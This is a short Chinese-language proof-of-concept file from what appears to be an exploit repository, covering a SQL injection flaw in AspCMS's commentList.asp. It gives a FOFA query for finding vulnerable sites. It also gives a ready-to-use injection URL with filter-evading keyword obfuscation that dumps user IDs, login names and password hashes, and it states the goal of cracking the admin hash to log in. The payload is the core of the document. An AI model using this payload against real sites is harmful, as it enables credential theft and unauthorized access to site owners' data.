POC/wpoc/AspCMS/AspCMS系统commentList.asp存在SQL注入漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

517 B
Raw Blame History

AspCMS系统commentList.asp存在SQL注入漏洞

AspCMS commentList.asp 存在SQL注入漏洞攻击者通过漏洞可以获取管理员md5的密码进行解密后登录获取敏感数据。

fofa

app="ASPCMS"

poc

/plug/comment/commentList.asp?id=-1%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now(),null,1%20%20frmasterom%20{prefix}user

image-20240619131305272